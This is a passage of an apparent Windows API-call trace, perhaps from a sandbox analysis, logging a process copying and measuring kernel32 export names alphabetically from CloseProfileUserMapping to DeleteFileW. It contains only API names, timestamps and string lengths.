lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.383] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.383] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.383] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.383] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.383] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.383] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.383] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.384] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.384] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.384] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.384] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.384] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.384] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.384] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.384] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.384] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.384] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.384] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.384] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.384] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.384] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.384] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.384] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.384] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.384] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.385] lstrlenA (lpString="COPYFILEA") returned 9 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.385] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.385] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.385] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.385] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.385] lstrlenA (lpString="COPYFILEW") returned 9 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.385] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.385] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.385] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.385] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.385] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.385] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.385] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.385] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.385] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.385] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.385] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.385] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.385] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.386] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.386] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.386] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.386] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.386] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.386] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.386] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.386] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.386] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.386] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.386] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.386] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.386] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.386] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.386] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.386] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.386] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.386] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.386] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.386] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.387] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.387] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.387] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.387] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.387] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.387] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.387] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.387] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.387] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.387] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.387] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.387] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.387] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.387] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.387] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.387] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.387] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.387] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.387] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.388] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.388] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.388] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.388] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.388] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.388] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.388] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.388] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.388] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.388] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.388] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.388] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.388] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.388] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.388] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.388] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.388] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.388] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.388] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.389] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.389] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.389] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.389] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.389] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.389] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.389] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.389] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.389] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.389] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.389] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.389] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.389] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.389] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.389] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.389] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.389] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.389] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.389] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.390] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.390] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.390] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.390] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.390] lstrlenA (lpString="DELETEATOM") returned 10 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.390] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.390] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.390] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.390] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.390] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.390] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" 